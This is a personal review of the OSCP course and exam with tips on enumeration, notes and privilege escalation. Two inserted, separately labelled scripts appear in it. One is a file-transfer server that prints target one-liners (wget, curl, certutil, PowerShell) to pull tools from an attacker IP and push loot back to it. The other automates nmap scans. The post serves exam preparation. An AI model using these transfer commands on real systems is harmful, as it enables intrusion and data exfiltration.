OSCP, the pain, the pleasure

Are you ready for the course? the exam?

TLDR

Script out as much as possible in order to save time and avoid fat-fingering mistakes. Enumerate, enumerate, enumerate. Practice privescs all the livelong day. Be very familiar with helpful guides such as g0tmi1k’s Linux privesc guide and the FuzzySecurity Windows privesc guide (or your personal favorites). Transferring files is easy enough… until it isn’t. Don’t neglect to practice various file transfer methods. Did you complete the one exploit tutorial in the course and never learn any more about this? If so, you’re going to have a long night come exam time. You don’t need to be an expert; that’s what the OSCE is for, after all. If you aren’t proficient at writing basic exploits, hit up Corelan and follow their basic exploitation tutorials.
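The file transfer point above is worth scripting once so it never bites you on exam night. The listener below is an added example, not code from the original post: one HTTP server that serves tools to the target (GET, like `python3 -m http.server`) and also accepts files back from it (PUT), so loot comes home over the port you already opened. It assumes Python 3.7+ on the attacking box and that the target has curl, wget, certutil or PowerShell; the IPs, ports, file names and the "linpeas.sh" sample file are placeholders I made up for illustration.

```python
"""Added example, not code from the original post: one HTTP listener that both
serves tools to a target (GET) and accepts files back from it (PUT).

Assumes Python 3.7+ on the attacking box and that the target has one of
curl, wget, certutil or PowerShell. IPs, ports and file names are placeholders.
"""
import functools
import os
import tempfile
import threading
import urllib.request
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from pathlib import Path
from urllib.parse import unquote


class TransferHandler(SimpleHTTPRequestHandler):
    upload_dir = "loot"              # overridden per server in start_server()
    max_upload = 256 * 1024 * 1024   # refuse silly Content-Length values

    def do_PUT(self):
        # Keep only the last path component: a client that sends
        # PUT /../../root/.ssh/authorized_keys must not escape upload_dir.
        name = os.path.basename(unquote(self.path.split("?", 1)[0]))
        if name in ("", ".", ".."):
            name = "unnamed"
        try:
            length = int(self.headers.get("Content-Length", ""))
        except ValueError:
            self.send_error(411, "Content-Length required")
            return
        if not 0 <= length <= self.max_upload:
            self.send_error(413, "Upload too large")
            return
        dest = Path(self.upload_dir)
        dest.mkdir(parents=True, exist_ok=True)
        written = 0
        with open(dest / name, "wb") as fh:
            while written < length:
                chunk = self.rfile.read(min(length - written, 65536))
                if not chunk:
                    break
                fh.write(chunk)
                written += len(chunk)
        self.send_response(201)
        self.send_header("Content-Length", "0")
        self.end_headers()
        self.log_message("stored %d bytes in %s", written, dest / name)


def start_server(serve_dir, upload_dir, host="0.0.0.0", port=8000):
    """Serve files from serve_dir, store PUT bodies in upload_dir; runs in a daemon thread."""
    bound = type("BoundHandler", (TransferHandler,), {"upload_dir": str(upload_dir)})
    factory = functools.partial(bound, directory=str(serve_dir))
    server = ThreadingHTTPServer((host, port), factory)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def target_commands(attacker_ip, port, tool, loot="loot.txt"):
    """One-liners to paste on the target; attacker_ip is this box as the target sees it."""
    base = f"http://{attacker_ip}:{port}"
    return {
        "linux pull":   f"wget {base}/{tool} -O /tmp/{tool} || curl -o /tmp/{tool} {base}/{tool}",
        "linux push":   f"curl -T {loot} {base}/{loot}",
        "windows pull": f"certutil -urlcache -split -f {base}/{tool} {tool}",
        "windows push": f"powershell -c \"Invoke-RestMethod -Method Put -Uri {base}/{loot} -InFile {loot}\"",
    }


def demo_roundtrip():
    """Offline self-check on 127.0.0.1: pull a file, push one back, try to escape upload_dir."""
    root = Path(tempfile.mkdtemp())
    (root / "share").mkdir()
    # Constructed sample file standing in for a real tool.
    (root / "share" / "linpeas.sh").write_bytes(b"#!/bin/sh\necho constructed sample\n")
    server = start_server(root / "share", root / "loot", host="127.0.0.1", port=0)
    base = f"http://127.0.0.1:{server.server_address[1]}"
    pulled = urllib.request.urlopen(f"{base}/linpeas.sh").read()
    # %2e%2e%2f is "../" URL-encoded; after unquote+basename it must land inside loot/.
    req = urllib.request.Request(f"{base}/%2e%2e%2fshare%2fhacked.txt", data=b"secret", method="PUT")
    status = urllib.request.urlopen(req).status
    server.shutdown()
    server.server_close()
    return {
        "pulled": pulled,
        "put_status": status,
        "stored": (root / "loot" / "hacked.txt").read_bytes(),
        "escaped": (root / "share" / "hacked.txt").exists(),
    }


if __name__ == "__main__":
    print(demo_roundtrip())
    for kind, cmd in target_commands("10.10.14.3", 8000, "linpeas.sh").items():
        print(f"{kind:13} {cmd}")
```

Run it with `python3 xfer.py` on the attacking box, then paste the printed one-liner for the target's OS. PUT is used rather than a multipart form because `curl -T` and `Invoke-RestMethod -InFile` send the raw file body, so what lands in `loot/` is byte-for-byte what left the target; the basename stripping is the one check that matters, since anything with a shell on the target can talk to this port.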

My background

It’s important to know a little about someone’s background if you want to understand their perspective. I took the course and exam some time ago, but when I did, I already had vast experience in varied aspects of cyber operations, often in restrictive environments. I was experienced not only with “hacking”, but also with intrusion analysis and cyber threat analysis. Because of that experience, I had a good intuitive sense for what is normal vs. abnormal in Windows and Linux environments. That proved to be no guarantee of anything, however, as many systems presented unique challenges in the lab as well as on the exam. I have yet to meet anyone who claims to have gained nothing from the labs, regardless of experience. Personally, I felt the course was both fun and difficult, while the exam was challenging but fair.

The Labs

There are plenty of reviews out there regarding the labs, so I don’t want to repeat too much here. I only completed about 12–15 of the lab machines and intentionally sought out some of the more challenging ones. The whole point of these machines, besides being really fun yet paradoxically miserable, is to hone your abilities by exposing you to various difficult situations. A workout session for the hacker mind, if you will. The more you engage with the lab machines, the more experience you’ll have for the exam and for real engagements as well.

Great note keeping is a must throughout the course and labs. I kept a running notebook using CherryTree and documented everything along the way. I had nodes for various scripts, common one-liners, and other things for quick reference. I kept very detailed accounts of my actions on targets, and after each successful compromise, I made sure to write a detailed transcript of exactly how it was compromised. Some of the systems are pretty tough and require a bit of research, but there are plenty of easy kills as well. If you really need pointers, you can always head to the forums, but it’s much more rewarding if you’re able to get there without any nudging.

The Exam

I failed the exam previously because I rushed the enumeration process and ended up chasing my tail for hours trying to catch the fart of a ghost with my bare hands. Don’t do that. Some puzzles are just not meant to be solved. The next time, I decided that if my current approach/attack vector hadn’t produced results, or didn’t quickly look like it would, I’d rotate to something else.

If I were to emphasize anything, it would be this: don’t skimp on the enumeration even if it feels slow going. The more you do up front, the more your mind can be at ease later when you realize you’re on a bad path and start wondering what else this target might be open to. Don’t over-think the situation. You shouldn’t have to learn an entirely new concept here. You might have to do some research to see how something works, but nothing is on the exam that wasn’t covered in the course material, at least in principle. Keep some kind of history of your actions so that you can more easily write the report later.

  • I picked a time that was closer to my normal waking time because I knew if I attempted to work on this for a few hours and then sleep, I’d spend all night going over solutions versus actually resting.
  • I used CherryTree to keep active notes for each target which made reporting much easier.
  • I created a separate terminal for each target and created tabs as necessary. I used Terminator, so I also split windows as needed. I started a script session for each new window and ensured the terminal’s scrollback buffer was set to unlimited. I didn’t close a single terminal until I had submitted the report.
  • For each host, I did a basic nmap scan of the top 1000 ports just to get started.
  • Once I had started looking through those results, I kicked off a full scan for each host. I had previously written a script but later found a better one here.
  • I started making a list of potential vulnerabilities based off of the port scan results. I didn’t even start attempting to gain access to any host until I had reviewed the scans and made a prioritized list. Except for one target; something just stood out, and I was fortunate that it panned out.
  • For me, the targets that were supposed to be difficult, points-wise, turned out to be pretty straightforward (don’t confuse that with easy), and I only had to spend a couple of hours on those in total.
  • I had a doozy of a time with the more moderate boxes, however. It reminded me of the time when I was a beginner in BJJ, and I kept using my strength to compensate for my complete lack of ability. The instructor had me roll with him and it was miserable. He’d let me get close to something and then just take it away, and this went on until finally I threw up. These things made me feel like a complete scrub. I finally got access on one of them and realized I’d been completely overthinking this thing. Getting privesc was no picnic either. It wasn’t quite as obvious, but it was pretty much in plain sight had I stuck to the plan of avoiding rabbit holes. It’s just that rabbits taste so good!
  • After conquering that truly vexing target, I had the points I needed to pass and decided to get started on the report. I ended up with a nearly finished report before calling it quits for the night.
  • After everything, I think I spent about 12–14 hours total actively at the keyboard before starting on the report. Had I paid better attention, I think that could have been shortened to about 8–10 hours or so.
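The scan workflow in the list above (top-1000 scan first, full scan once you have something to read, then a prioritized list built from the results) is exactly the kind of thing the TLDR says to script. What follows is an added example, not the author’s script or the one linked as "better": it parses nmap’s grepable (-oG) output, builds the follow-up full-port and service scans for each host, and seeds a per-host triage list. The grepable text in SAMPLE_GNMAP is constructed, not real scan data, and the nmap flags and FIRST_LOOKS notes are my own choices.

```python
"""Added example (not from the original post): the two-stage nmap workflow
scripted so every host gets the same treatment. The -oG sample below is
constructed, not real scan data; nmap itself only runs from __main__.
"""
import re
import subprocess
from collections import defaultdict

# Constructed grepable output for two hosts; the version strings are made up.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -oG quick.gnmap 10.11.1.0/24\n"
    "Host: 10.11.1.5 ()\tStatus: Up\n"
    "Host: 10.11.1.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, "
    "80/open/tcp//http//Apache httpd 2.4.6/, 139/filtered/tcp//netbios-ssn///"
    "\tIgnored State: closed (997)\n"
    "Host: 10.11.1.22 ()\tPorts: 445/open/tcp//microsoft-ds///, "
    "3389/open/tcp//ms-wbt-server///, 8080/open/tcp//http-proxy///"
    "\tIgnored State: filtered (997)\n"
    "# Nmap done\n"
)

# nmap's grepable port record is port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(open|closed|filtered|open\|filtered)/(tcp|udp)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(port, proto, service), ...]} for ports nmap reported open."""
    found = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service in PORT_RE.findall(ports_field):
            if state == "open":          # filtered/closed are noise for the target list
                found[host].append((int(port), proto, service))
    return dict(found)


def quick_scan_cmd(host, outbase):
    """Stage 1: default top-1000 TCP ports, written in all three formats (-oA)."""
    return ["nmap", "-Pn", "--top-ports", "1000", "-oA", outbase, host]


def full_scan_cmd(host, outbase):
    """Stage 2: every TCP port, so a listener on 4444 or 65000 does not slip past."""
    return ["nmap", "-Pn", "-p-", "--min-rate", "1000", "-oA", outbase, host]


def service_scan_cmd(host, entries, outbase):
    """Stage 3: version detection and default scripts, only on the ports seen open."""
    ports = ",".join(str(p) for p, proto, _ in sorted(entries) if proto == "tcp")
    return ["nmap", "-Pn", "-sV", "-sC", "-p", ports, "-oA", outbase, host]


# My own first-look notes per service: the start of the prioritized list, not the end.
FIRST_LOOKS = {
    "ssh": "note the banner version; retry any creds found elsewhere",
    "http": "gobuster/dirb, nikto, robots.txt, default creds on any admin panel",
    "http-proxy": "treat as http; on 8080 it is usually an app server",
    "microsoft-ds": "smbclient -L //host -N, enum4linux -a, nmap --script smb-vuln*",
    "ms-wbt-server": "RDP: only useful once you have credentials",
}


def triage(open_by_host):
    """Return {host: [(port, service, note), ...]} to seed the per-host to-do list."""
    return {
        host: [(p, svc, FIRST_LOOKS.get(svc, "research the service and version"))
               for p, _, svc in sorted(entries)]
        for host, entries in sorted(open_by_host.items())
    }


def run(cmd):
    """Run one nmap command and return the path of its .gnmap file."""
    subprocess.run(cmd, check=True)
    return cmd[cmd.index("-oA") + 1] + ".gnmap"


if __name__ == "__main__":
    import sys
    for host in sys.argv[1:]:
        quick = parse_gnmap(open(run(quick_scan_cmd(host, f"{host}_quick"))).read())
        for h, todo in triage(quick).items():
            print(h, *todo, sep="\n  ")
        full = parse_gnmap(open(run(full_scan_cmd(host, f"{host}_full"))).read())
        run(service_scan_cmd(host, full.get(host, []), f"{host}_svc"))
```

Usage is `python3 enum.py 10.11.1.5 10.11.1.22` from a terminal you have already put under `script`, so the nmap output and the printed triage list both end up in the typescript. The parser keys on the grepable format deliberately: it is stable across nmap versions and trivially diffable, which matters when you want to compare the quick and full scans for a host later.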

Useful Links

Useful Tools

www.securitysift.com/download/linuxprivchecker.py
http://www.securitysift.com/download/recon_scan.zip
https://www.rebootuser.com/?p=1758
http://www.darknet.org.uk/2015/10/windows-privesc-check-windows-privilege-escalation-scanner/
https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://github.com/n3ko1/WrapMap
http://www.fuzzysecurity.com/scripts/3.html